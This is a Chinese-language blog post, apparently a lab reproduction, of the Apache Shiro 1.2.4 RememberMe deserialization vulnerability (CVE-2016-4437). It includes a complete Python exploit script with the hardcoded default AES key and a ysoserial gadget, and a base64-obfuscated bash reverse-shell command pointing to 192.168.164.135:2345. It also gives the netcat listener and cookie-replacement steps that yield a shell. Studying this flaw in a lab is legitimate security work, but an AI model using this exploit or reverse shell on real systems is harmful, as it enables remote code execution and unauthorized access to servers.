Shiro RememberMe 1.2.4 反序列化漏洞(Shiro-550, CVE-2016-4437)復現
前言
接下來一段時間要做漏洞復現和代碼審計,算是一個小目標把
開始
環境搭建
使用docker復現
啓動docker
systemctl start docker
下載鏡像和啓動環境
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 81:8080 medicean/vulapps:s_shiro_1
因爲centos有apache佔用了80,這裏的81端口可以自己修改
工具準備
1.shiro_poc.py
# pip install pycrypto
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
with open("/tmp/payload.cookie", "w") as fpw:
print("rememberMe={}".format(payload.decode()), file=fpw)
將這個腳本放到tmp目錄下
2.ysoserial的jar文件
安裝git
apt-get install git
安裝maven
wget https://downloads.apache.org/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
cd /usr/local
tar -zxvf apache-maven-3.6.3-bin.tar.gz
vi /etc/profile
export MAVEN_HOME=/usr/local/apache-maven-3.6.3
export PATH=$MAVEN_HOME/bin:$PATH
source /etc/profile
mvn -v
/usr/local/apache-maven-3.6.3/conf/setting.xml
找到mirrors節點添加阿里鏡像庫地址:
<mirrors>
<mirror>
<id>alimaven</id>
<name>aliyun maven</name>
<url>http://maven.aliyun.com/nexus/content/groups/public/</url>
<mirrorOf>central</mirrorOf>
</mirror>
</mirrors>
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -DskipTests
cp target/ysoserial-0.0.6-SNAPSHOT-all.jar /tmp
安裝模塊
pip3 install pycrypto
開始執行
要執行的命令命令
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx}|{base64,-d}|{bash,-i}
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx
爲bash -i >& /dev/tcp/192.168.164.135/2345 0>&1
經過base64編碼
開啓監聽
nc -lvvp 2345
python3 shiro_poc.py "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx}|{base64,-d}|{bash,-i}"
會在/tmp下找到payload.cookie
瀏覽器打開網址並登陸進去,點擊account page抓包
用payload.cookie中內容替換Cookie中的全部內容
回到監聽查看
已經得到權限
參考文章
https://paper.seebug.org/shiro-rememberme-1-2-4/#0x01
https://www.cnblogs.com/paperpen/p/11312671.html
https://www.cnblogs.com/tr1ple/p/11662193.html